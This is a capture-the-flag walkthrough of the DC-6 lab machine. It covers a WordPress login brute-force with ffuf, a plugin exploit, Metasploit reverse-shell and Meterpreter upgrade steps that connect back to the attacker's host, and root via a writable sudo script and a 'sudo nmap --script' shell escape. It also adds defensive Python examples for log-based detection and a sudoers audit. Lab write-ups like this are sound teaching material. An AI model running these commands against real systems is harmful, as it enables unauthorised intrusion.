DC-6


author: leadlife

date: 2023/5/17

blog: https://tripse.github.io/

Tools used in this test:

  • Information gathering: nmap, fscan, cmseek, searchsploit, ffuf, burpsuite
  • Shell: MSF, netcat
  • Internal information gathering: none
  • Privilege escalation: none

External information gathering

Host discovery with an Nmap ping (ICMP) scan

Target IP for this test: 10.10.10.135

```shell
sudo nmap -sP 10.10.10.0/24 -T4 --min-rate 10000
```

```text
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-17 03:10 CST
Nmap scan report for 10.10.10.135
Host is up (0.00020s latency).
MAC Address: 08:00:27:D7:63:00 (Oracle VirtualBox virtual NIC)
Nmap scan report for 10.10.10.254
Host is up (0.00019s latency).
MAC Address: 00:50:56:FE:A1:CD (VMware)
Nmap scan report for 10.10.10.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 0.36 seconds
```

Open-port discovery with fscan

```shell
sudo fscan -h 10.10.10.135 -p 0-65535 -t 30
```

```text
fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.135 is alive
[*] Icmp alive hosts len is: 1
10.10.10.135:22 open
10.10.10.135:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://10.10.10.135 code:301 len:0 title:None 跳转url: http://wordy/
```

Detailed port scan with Nmap

```shell
sudo nmap -sS -sC -sV -O -T4 --min-rate 10000 10.10.10.135 -oN nmap.all
```

```text
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-17 03:13 CST
Nmap scan report for 10.10.10.135
Host is up (0.00035s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 3e52cece01b694eb7b037dbe087f5ffd (RSA)
|   256 3c836571dd73d723f8830de346bcb56f (ECDSA)
|_  256 41899e85ae305be08fa4687106b415ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
MAC Address: 08:00:27:D7:63:00 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.61 seconds
```

Editing the hosts file

The redirect target http://wordy/ cannot be reached, so add a hosts entry for it

image-20230517031413828

image-20230517031449109

Accessing it again now works, and the site turns out to be a WordPress CMS

image-20230517031527024

Identifying the CMS version with CMSeeK

The results are as follows:

image-20230517031625031

Save the enumerated usernames as a list; it is used for the brute-force attempt later:

```text
leadlife@endeavrouOS ~/p/DC6> cat user.txt
mark
admin
graham
jens
sarah
```

Searching for vulnerabilities in this CMS version with searchsploit

No remote RCE

image-20230517031846195

Getting into the admin panel

Brute force

ffuf is used; the procedure is:

  • Capture the request with Burp Suite
  • Save the request as a text file
  • Replace the fields to fuzz with FUZZ markers

Default WordPress login URL: http://wordy/wp-login.php

1: Capture the request with Burp Suite

image-20230517032329271

2: Save the request as a text file

image-20230517032404607

3: Replace the fields to fuzz with FUZZ markers

image-20230517034837865

4: Start the brute force

Hint from the box author:

image-20230517034518916

Export the passwords containing k01 with the following command:

seclists already ships rockyou: /usr/share/seclists/Passwords/Leaked-Databases

```text
leadlife@endeavrouOS /u/s/s/P/Leaked-Databases> pwd
/usr/share/seclists/Passwords/Leaked-Databases
leadlife@endeavrouOS /u/s/s/P/Leaked-Databases> ls | grep rockyou
rockyou-05.txt
rockyou-10.txt
rockyou-15.txt
rockyou-20.txt
rockyou-25.txt
rockyou-30.txt
rockyou-35.txt
rockyou-40.txt
rockyou-45.txt
rockyou-50.txt
rockyou-55.txt
rockyou-60.txt
rockyou-65.txt
rockyou-70.txt
rockyou-75.txt
rockyou.txt
rockyou.txt.tar.gz
rockyou-withcount.txt.tar.gz
```

Run the ffuf brute force (-fw 188 filters out the responses with 188 words, i.e. the failed logins):

```shell
ffuf -request data.txt -request-proto http -mode clusterbomb -w user.txt:FUZZ1 -w passwords.txt:FUZZ2 -t 30 -rate 10000 -fw 188
```

image-20230517035155624

Login succeeded:

image-20230517035312749
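From the defender's side, the burst of POSTs to wp-login.php that the ffuf clusterbomb above produces is easy to spot in the web server's access log. The Python script below is an added example, not part of the original post: it runs over constructed Apache combined-format lines, flags any client that posts to wp-login.php repeatedly inside a short window, and notes when the burst ends in a 302 (the redirect WordPress issues on a successful login, whereas a failed login re-renders the form with a 200).

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-format lines (not from the original post): one
# client hammers wp-login.php, gets the same-sized 200 page on every failed
# try, then a 302 once a guess succeeds; a second client logs in once.
SAMPLE_LOG = """\
10.10.10.1 - - [17/May/2023:03:51:01 +0800] "GET /wp-login.php HTTP/1.1" 200 2430 "-" "Mozilla/5.0"
10.10.10.1 - - [17/May/2023:03:51:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2610 "-" "Mozilla/5.0"
10.10.10.1 - - [17/May/2023:03:51:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2610 "-" "Mozilla/5.0"
10.10.10.1 - - [17/May/2023:03:51:03 +0800] "POST /wp-login.php HTTP/1.1" 200 2610 "-" "Mozilla/5.0"
10.10.10.1 - - [17/May/2023:03:51:03 +0800] "POST /wp-login.php HTTP/1.1" 200 2610 "-" "Mozilla/5.0"
10.10.10.1 - - [17/May/2023:03:51:04 +0800] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
10.10.10.50 - - [17/May/2023:03:52:10 +0800] "POST /wp-login.php HTTP/1.1" 302 - "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def parse(log_text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield rec

def find_login_bursts(log_text, window_s=60, threshold=5):
    """Flag clients that POST to wp-login.php at least `threshold` times within
    `window_s` seconds. Returns {ip: {"attempts": n, "success_after": bool}};
    success_after is True when a 302 (successful login) occurs in the burst."""
    posts = defaultdict(list)
    for rec in parse(log_text):
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            posts[rec["ip"]].append((rec["ts"], rec["status"]))
    alerts = {}
    for ip, events in posts.items():
        events.sort()
        for i, (t0, _) in enumerate(events):          # sliding window from each hit
            j = i
            while j < len(events) and (events[j][0] - t0).total_seconds() <= window_s:
                j += 1
            if j - i >= threshold:
                alerts[ip] = {"attempts": j - i,
                              "success_after": any(st == "302" for _, st in events[i:j])}
                break
    return alerts
```

With the post's ffuf settings (-t 30 -rate 10000) the real burst is thousands of requests per minute, so the threshold of 5 is deliberately conservative; a rate limit or lockout on wp-login.php is the matching mitigation.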

Getting a shell from the admin panel

The Activity monitor plugin is installed

image-20230517035418500

Check whether this plugin has a known vulnerability:

image-20230517035931306

Exploitation attempt

Shell obtained

Copy the exploit into the current directory: searchsploit -m php/webapps/50110.py

imag1231

Stabilizing the shell

Because this shell is unstable, MSF is used to get a stable one

```text
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  0.0.0.0          yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > exploit
```

image-20230517040456754

Upgrading the shell

Next, convert it to a Meterpreter shell

Module used: post/multi/manage/shell_to_meterpreter

Steps:

  • First send the current session to the background: background
  • Run the module; watch out for ports already in use
```text
background
Background session 1? [y/N] y
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST    0.0.0.0          no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION  1                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(multi/manage/shell_to_meterpreter) > set lhost 10.10.10.1
lhost => 10.10.10.1
msf6 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.1:4321
[*] Sending stage (1017704 bytes) to 10.10.10.135
[*] Meterpreter session 2 opened (10.10.10.1:4321 -> 10.10.10.135:58272) at 2023-05-17 04:11:21 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > sessions -i

Active sessions
===============

  Id  Name  Type                   Information                 Connection
  --  ----  ----                   -----------                 ----------
  1         shell sparc/bsd                                    10.10.10.1:4444 -> 10.10.10.135:55952 (10.10.10.135)
  2         meterpreter x86/linux  www-data @ 10.10.10.135     10.10.10.1:4321 -> 10.10.10.135:58272 (10.10.10.135)

msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 10.10.10.135
OS           : Debian 9.8 (Linux 4.9.0-8-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```

Then run shell -t to get an interactive shell; if shell -t does not work, type shell instead and spawn an interactive shell with Python

```text
meterpreter > shell
Process 1617 created.
Channel 4 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-6:/home$ export TERM=xterm
```

Internal information gathering

Kernel and distribution

image-20230517041725817

SUID

No exploitable SUID binaries

```shell
# stderr goes to /dev/null so unreadable directories do not clutter the listing
find / -perm -4000 2>/dev/null
```

```text
www-data@dc-6:/home$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping
```

SUDO

No sudo rights

image-20230517041816669

Privilege escalation

graham's password is found in mark's home directory:

image-20230517042249110

A shell script, backups.sh, is found in jens's home directory and looks like a cron job; checking the crontab rules out that escalation path

image-20230517042405384

After switching to graham there is a sudo entry, for the file /home/jens/backups.sh

Checking graham's permissions shows membership of the devs group, which can freely modify backups.sh:

image-20230517043226116

Edit backups.sh as follows:

image-20230517043426266

Running it yields a shell as jens:

image-20230517043836599

Privilege escalation via sudo

sudo nmap privilege escalation

image-20230517043900025

This method fails: it only works on older Nmap versions

```shell
sudo nmap --interactive
nmap> !sh
```

Method 2:

```shell
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
```

image-20230517044545250
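Both escalation paths above (the group-writable backups.sh that graham may run as jens via sudo, and sudo nmap for jens) come down to sudo rules that should never have been granted. The Python audit below is an added example, not from the original post: it parses sudoers-style lines and flags unrestricted rules, targets that a non-root user can modify, and targets that can spawn a shell by themselves (only nmap is listed, since that is what the post demonstrates); the file layout it checks is rebuilt in a temp directory and the rules are constructed to mirror the box.

```python
import os
import stat
import tempfile

# sudo targets that can spawn a shell on their own; the post shows only nmap
# (sudo nmap --script=<lua file>), so that is the single entry assumed here.
SHELL_CAPABLE = {"nmap"}

def writable_by_others(path):
    """True if a non-root user can edit the file or swap it via its directory."""
    def loose(st):  # non-root owner, or group/world write bit set
        return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    return loose(os.stat(path)) or loose(os.stat(os.path.dirname(path) or "."))

def audit_sudoers(rules):
    """Check sudoers-style lines 'user host=(runas) [NOPASSWD:] command'.
    Returns (user, command, reason) findings; Defaults/alias lines are skipped."""
    findings = []
    for line in rules:
        parts = line.split("#", 1)[0].split(None, 1)
        if len(parts) < 2 or "=" not in parts[1] or parts[0] == "Defaults" \
                or parts[0].endswith("_Alias"):
            continue
        user, spec = parts[0], parts[1].split("=", 1)[1].strip()
        if spec.startswith("("):                      # drop the (runas) part
            spec = spec.split(")", 1)[1].strip()
        for tag in ("NOPASSWD:", "PASSWD:"):
            if spec.startswith(tag):
                spec = spec[len(tag):].strip()
        cmd = (spec.split() or [""])[0]               # command without its arguments
        if cmd == "ALL":
            findings.append((user, cmd, "unrestricted sudo"))
        elif os.path.basename(cmd) in SHELL_CAPABLE:
            findings.append((user, cmd, "target can spawn a shell"))
        elif os.path.exists(cmd) and writable_by_others(cmd):
            findings.append((user, cmd, "target writable by a non-root user"))
    return findings

def demo():
    """Rebuild the DC-6 situation in a temp dir (constructed, not the real box):
    a group-writable backups.sh that graham may run as jens, and sudo nmap for jens."""
    script = os.path.join(tempfile.mkdtemp(), "backups.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\n# placeholder backup job\n")
    os.chmod(script, 0o770)                           # the devs group can edit it
    return audit_sudoers([f"graham ALL=(jens) NOPASSWD: {script}",
                          "jens ALL=(root) NOPASSWD: /usr/bin/nmap"])
```

The fix on the box side is the same for both findings: sudo targets must be root-owned and writable only by root, and a binary that can run arbitrary scripts should not be granted through sudo at all.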